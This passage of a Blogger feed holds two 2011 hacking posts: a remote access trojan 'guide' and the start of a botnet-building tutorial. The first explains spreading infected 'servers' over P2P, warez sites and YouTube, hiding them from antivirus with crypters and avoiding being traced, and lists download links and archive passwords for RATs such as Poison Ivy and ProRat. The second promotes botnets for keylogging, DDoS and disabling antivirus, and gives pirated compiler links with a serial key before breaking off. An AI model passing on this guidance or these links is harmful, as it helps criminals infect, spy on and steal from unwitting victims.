blue;"&gt;Some RATs can spread over P2P file sharing programs(uTorrent, Pirate Bay etc.), Messangers spams(MSN, Skype, AIM etc.).&lt;/span&gt;&lt;br /&gt;&lt;div style="color: red; font-weight: bold;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; font-weight: bold;"&gt;Download?&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Well you can find any type of RAT here, on &lt;b&gt;sprawd-tutor.blogspot.com&lt;/b&gt;. To download. &amp;nbsp;and you will find some links. Also, you can buy FUD private version of RAT: Albertino RAT, Medusa Rat, jRAT etc. Also you will need DNS host for your RAT.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;How do I control server?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;What do I need to setup RAT?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Well, you will need Windows OS, open port &amp;amp; RAT. To forward your port scroll for tutorial link or click this URL.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;How do I port forward?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Port forwarding is easy and important for RAT. Well, you need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter(write Username: Admin &amp;amp; Password: Admin), open port forward page and write port you want and your IP. Well that’s all you need to do and now you got open port.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;How do I make my server FUD?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;If you want to make your server FUD again, you will need crypter(you can find free FUD one here.). Also, you can hex edit your server, but be careful some servers can crash after hex editing, any way check out this cool tutorial How to make FUD with hex editing.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;How do I remove server if I infect myself?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. Well there is another way, download MalwareBytes’ Anti-Malware and scan whole computer for Trojan.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;Legal or illegal?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Well some RATs are legal, and some are not. Legal are the one without backdoor left, and they have abillity to close connection anytime. Illegal are used for hacking and they can steal data(Credit Cards, Passwords, private data etc.).&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;Legal :&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;TeamViewer&lt;/span&gt; – &lt;span class="Apple-style-span" style="color: orange;"&gt;Access any remote computer via Internet just like sitting in front of it – even through firewalls.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;UltraVNC&lt;/span&gt; – &lt;span class="Apple-style-span" style="color: orange;"&gt;Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Ammyy Admin&lt;/span&gt; – &lt;span class="Apple-style-span" style="color: orange;"&gt;Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Mikogo&lt;/span&gt; – &lt;span class="Apple-style-span" style="color: orange;"&gt;Mikogo is an Online Meeting, Web Conferencing &amp;amp; Remote Support tool where you can share your screen with 10 participants in real-time over the Web.&lt;/span&gt;&lt;/blockquote&gt;&amp;nbsp;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;Illegal :&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;span class="Apple-style-span" style="color: #f4cccc;"&gt;Spy-Net&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #f4cccc;"&gt;Cerberus Rat&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #f4cccc;"&gt;CyberGate Rat&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #f4cccc;"&gt;SubSeven&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #f4cccc;"&gt;Turkojan&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #f4cccc;"&gt;ProRat&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;D&lt;/span&gt;&lt;span class="Apple-style-span" style="color: orange;"&gt;o&lt;/span&gt;&lt;span class="Apple-style-span" style="color: yellow;"&gt;w&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;n&lt;/span&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;l&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;o&lt;/span&gt;&lt;span class="Apple-style-span" style="color: purple;"&gt;a&lt;/span&gt;&lt;span class="Apple-style-span" style="color: magenta;"&gt;d&lt;/span&gt;&lt;span class="Apple-style-span" style="color: red;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c1130;"&gt;R&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;A&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;T&lt;/span&gt;&lt;/b&gt; &lt;span class="Apple-style-span" style="color: #0c343d;"&gt;:&lt;/span&gt; &lt;input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }" style="font-size: 10px; margin: 0px; padding: 0px; width: 60px;" type="button" value="Show" /&gt; &lt;/div&gt;&lt;br /&gt;&lt;div class="alt2" style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: #060606 none repeat scroll 0% 50%; border: 1px inset; color: #7f4500; line-height: 1.5em; margin: 0px; padding: 6px;"&gt;&lt;div style="display: none;"&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Cerberus Rat&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/mbe9161b/Cerberus.rar"&gt;Cerberus.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Nuclear Rat 2.1.0&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/4ZIOSRJG/NuclearRat.rar.html"&gt;NuclearRat.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Poison Ivy Rat&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://www.poisonivy-rat.com/index.php?link=download"&gt;PoisonivyRat.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;ProRat RAT&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Password: oksa52wq&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: magenta;"&gt;Username: mohdjase1 Password: 66618e869accfc4f96&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/MTE65R3D/ProRatSE.rar.html"&gt;ProRatSE.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;CyberGate Rat&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/23b14467/CyberGate%2Bv1.00.1.rar"&gt;CyberGate2Bv1.00.1.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Seed 1.1 Rat&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/QESMWWA0/Seed1.1.zip.html"&gt;Seed1.1.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Bifrost Rat&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/CUP1QGM3/Bifrost12.zip.html"&gt;Bifrost12.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Lost door v4.2 LIGHT&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/f277398c/Lost%2BDoor%2BV4.2%2Blight.zip"&gt;LostDoorV4.2light.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Apocalypse Rat&lt;/span&gt;&lt;br /&gt;Download:&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;&amp;nbsp;&lt;a href="http://uploading.com/files/4eca9bdd/Apocalypse144.rar"&gt;Apocalypse144.rar&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;SubSeven Rat&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/4JFEZPNW/Sub7v2.2.zip.html"&gt;Sub7v2.2.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Shark Rat v3.0.0&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/O84EB7K0/sharK_3.rar.html"&gt;sharK_3.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Spy-Net RAT&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Password: Spy-Net&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/2717bd57/Spt-Net%2B%255BRAT%255D%2Bv2.6.rar/"&gt;Spt-NetRAT v2.6.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #ffd966;"&gt;Turkojan Gold RAT&lt;/span&gt;&lt;br /&gt;Download:&amp;nbsp;&lt;a href="http://uploading.com/files/c7c5d282/Turkojan4Gold.rar"&gt;Turkojan4Gold.rar&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Where and how do I spread?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites(uTorrent, Pirate bay etc.), YouTube etc. Well some people use custom made Auto-Spreaders programs to spread their server. But best and most effective way to spread is when you FUD your server.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;Whats DNS host?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;What can RAT do?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;• Manage files&lt;br /&gt;• Control web browser(Change homepage, open site etc.)&lt;br /&gt;• Get system informations(OS Version, AV name, Ram Memory, Computer name etc.)&lt;br /&gt;• Get passwords, credit card numbers or private data etc.&lt;br /&gt;• View and remote control desktop&lt;br /&gt;• Record camera &amp;amp; sound&lt;br /&gt;• Control mouse&lt;br /&gt;• Delete, rename, download, upload or move files&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;What’s reverse Connection?&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Whats direct connection?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;Can I get traced when I rat somebody?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace, because PC usually got over 300 connections. So don’t worry.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Direct connection:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;span class="Apple-style-span" style="color: magenta;"&gt;[Client]&lt;br /&gt;| &amp;nbsp; &amp;nbsp;[Client]&lt;br /&gt;| &amp;nbsp; &amp;nbsp; &amp;nbsp;/&lt;br /&gt;| &amp;nbsp; &amp;nbsp; /&lt;br /&gt;| &amp;nbsp; &amp;nbsp;/&lt;br /&gt;| &amp;nbsp; /&lt;br /&gt;[Server]-----[Client]&lt;/span&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-5300589947414694832?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/5300589947414694832/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/remote-administration-tool-rat-guide.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/5300589947414694832'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/5300589947414694832'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/remote-administration-tool-rat-guide.html' title='Remote Administration Tool (RAT) Guide'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_qH05FKdqQD4/TM20ELVTcJI/AAAAAAAAAg4/vYkOKYFucxg/s72-c/prorat+2.0.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-7372331081716565621</id><published>2011-11-22T22:36:00.000-08:00</published><updated>2011-12-14T20:40:26.571-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>How To Create And Compile Botnets To Autohack 1000ds of Systems</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_JT7BiL7v2XY/Sqk6rGDBlzI/AAAAAAAAANM/gI_re-jDsLY/s320/botnet.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_JT7BiL7v2XY/Sqk6rGDBlzI/AAAAAAAAANM/gI_re-jDsLY/s320/botnet.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="https://rs121l32.rapidshare.com/#!download|121dt|28549191|rx-asn-2-re-worked_v3.rar|319|R~0|0|0"&gt;Download&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;What is a botnet?&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Depending on the source you used, the bot can do several things.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;I myself have helped write one of the most advanced and secure bot sources out there.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;(Off topic)&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;But once again depending on the source you can :&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Once again depending on the bot it may be able to kill other fellow competeter bots.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Or even kill AV/FW apon startup.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Add itself to registry.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Open sites.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Open commands.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Cmd,&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;notepad,&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;html,&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Anything is possible !&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Theres the infected computers "bots" the attacker, the server, and the victim.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.&lt;br /&gt;Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."&lt;/blockquote&gt;&lt;br /&gt;Botnets are being used for Google Adword click fraud, according to security watchers.&lt;br /&gt;&lt;br /&gt;Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.&lt;br /&gt;---------------&lt;br /&gt;Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:&lt;br /&gt;&lt;a href="http://rapidshare.com/files/18798734/DonttCare_Server_Editor_TuT..html"&gt;Download tutorial&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Here we go ladies and gentlemen&lt;/b&gt;&lt;br /&gt;Follow the tutorial:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1. Setting up the C++ compilier&amp;nbsp;: easy&lt;/b&gt;&lt;br /&gt;Download :&amp;nbsp;&lt;a href="http://www.megaupload.com/?d=SUHPYZRX"&gt;Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/21861555/msc__.rar.html"&gt;Server 2&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.0daymedia.net/p/files/id/274"&gt;Server 3 (Direct Download)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Serial Key :&lt;/span&gt; &lt;input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }" style="font-size: 10px; margin: 0px; padding: 0px; width: 60px;" type="button" value="Show" /&gt; &lt;/div&gt;&lt;br /&gt;&lt;div class="alt2" style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: #06060 none repeat scroll 0% 50%; border: 1px inset; color: #7f4500; line-height: 1.5em; margin: 0px; padding: 6px;"&gt;&lt;div style="display: none;"&gt;812-2224558&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Password :&lt;/span&gt; &lt;input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }" style="font-size: 10px; margin: 0px; padding: 0px; width: 60px;" type="button" value="Show" /&gt; &lt;/div&gt;&lt;br /&gt;&lt;div class="alt2" style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: #06060 none repeat scroll 0% 50%; border: 1px inset; color: #7f4500; line-height: 1.5em; margin: 0px; padding: 6px;"&gt;&lt;div style="display: none;"&gt;itzforblitz&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;2. Run setup.exe and install. Remember to input serial&lt;br /&gt;3. Download and install the&amp;nbsp;&lt;a href="http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&amp;amp;displaylang=en"&gt;Service Pack 6 (60.8 mb)&lt;/a&gt;&lt;br /&gt;4. After that Download and install:&amp;nbsp;&lt;a href="http://www.megaupload.com/?d=YH3SS78I"&gt;Windows SDK (1.2 mb)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/21854411/sdk.rar.html"&gt;Server 2&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.0daymedia.net/p/files/id/266"&gt;Server 3 (Direct Download)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Password :&lt;/span&gt; &lt;input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }" style="font-size: 10px; margin: 0px; padding: 0px; width: 60px;" type="button" value="Show" /&gt; &lt;/div&gt;&lt;br /&gt;&lt;div class="alt2" style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: #06060 none repeat scroll 0% 50%; border: 1px inset; color: #7f4500; line-height: 1.5em; margin: 0px; padding: 6px;"&gt;&lt;div style="display: none;"&gt;itzforblitz&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;2.&amp;nbsp;Configuring the C++ compilier (easy)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;1. Open up Microsoft Visual C++ Compilier 6.0&lt;br /&gt;2. Go to Tools &amp;gt; Options and Click the "Directories" tab&lt;br /&gt;3. Now, browse to these directories and add them to the list: (Click the dotted box to add)&lt;br /&gt;Quote:&lt;br /&gt;C:\PROGRAM FILES\MICROSOFT PLATFORM SDK&lt;br /&gt;C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN&lt;br /&gt;C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE&lt;br /&gt;C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB&lt;br /&gt;&lt;br /&gt;4. Now put them in this order: (use up and down arrows)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img472.imageshack.us/img472/1562/untitledfw2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="247" src="http://img472.imageshack.us/img472/1562/untitledfw2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;3. Configuring your bot: (easy)&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;1. Download and unpack:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a 